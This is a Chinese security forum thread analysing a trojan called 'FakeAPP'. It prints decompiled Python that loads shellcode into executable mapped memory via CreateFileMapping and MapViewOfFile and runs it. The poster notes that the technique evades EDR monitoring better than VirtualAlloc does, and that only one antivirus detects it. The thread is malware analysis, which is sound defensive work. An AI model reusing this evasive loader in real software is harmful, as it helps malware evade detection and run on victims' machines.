FakeAPP 1x

wowocock

只要木马作者稍微修改下启动，可以全过。
INVALID_HANDLE_VALUE = -1
PAGE_EXECUTE_READWRITE = 64
FILE_MAP_WRITE = 2
FILE_MAP_EXECUTE = 32
MEM_COMMIT = 4096
MEM_RESERVE = 8192
kernel32 = ctypes.windll.kernel32
CreateFileMapping = kernel32.CreateFileMappingW
CreateFileMapping.argtypes = [
    wintypes.HANDLE,
    ctypes.c_void_p,
    wintypes.DWORD,
    wintypes.DWORD,
    wintypes.DWORD,
    wintypes.LPCWSTR]
CreateFileMapping.restype = wintypes.HANDLE
MapViewOfFile = kernel32.MapViewOfFile
MapViewOfFile.argtypes = [
    wintypes.HANDLE,
    wintypes.DWORD,
    wintypes.DWORD,
    wintypes.DWORD,
    ctypes.c_size_t]
MapViewOfFile.restype = ctypes.c_void_p
UnmapViewOfFile = kernel32.UnmapViewOfFile
UnmapViewOfFile.argtypes = [
    ctypes.c_void_p]
UnmapViewOfFile.restype = wintypes.BOOL
CloseHandle = kernel32.CloseHandle
CloseHandle.argtypes = [
    wintypes.HANDLE]
CloseHandle.restype = wintypes.BOOL

def execute_shellcode(shellcode):
    hMapObject = CreateFileMapping(INVALID_HANDLE_VALUE, None, PAGE_EXECUTE_READWRITE, 0, len(shellcode), None)
    pAddress = MapViewOfFile(hMapObject, FILE_MAP_WRITE | FILE_MAP_EXECUTE, 0, 0, len(shellcode))
# WARNING: Decompyle incomplete

execute_shellcode(shellcode)

wowocock

上个版本也是我发现的，所以目前只有火绒能检测到。

wowocock

wowocock 发表于 2026-1-8 10:53
上个版本也是我发现的，所以目前只有火绒能检测到。

相比上个版本，这个版本木马作者增加了不少东西。

微微的笑

wowocock

微微的笑 发表于 2026-1-8 11:11

相对上一版的通过VirtualAlloc分配读写执行内存来执行SHELLCODE,新版通过映射内存来实现，减少EDR的监控。
def execute_shellcode(shellcode):
    hMapObject = CreateFileMapping(INVALID_HANDLE_VALUE, None, PAGE_EXECUTE_READWRITE, 0, len(shellcode), None)
    pAddress = MapViewOfFile(hMapObject, FILE_MAP_WRITE | FILE_MAP_EXECUTE, 0, 0, len(shellcode))

    try:

        try:
            ctypes.memmove(pAddress, bytes(shellcode), len(shellcode))
            shellcode_func = ctypes.CFUNCTYPE(None)(pAddress)
            shellcode_func()
        finally:
            UnmapViewOfFile(pAddress)
            CloseHandle(hMapObject)
            return True
            e = None

            try:
                pass
            finally:
                e = None
                del e
                UnmapViewOfFile(pAddress)
                CloseHandle(hMapObject)
                return False
                e = None
                del e
                UnmapViewOfFile(pAddress)
                CloseHandle(hMapObject)
            CloseHandle(hMapObject)
            return None




execute_shellcode(shellcode)

wowocock

火绒恶意木马专杀支持查杀处理。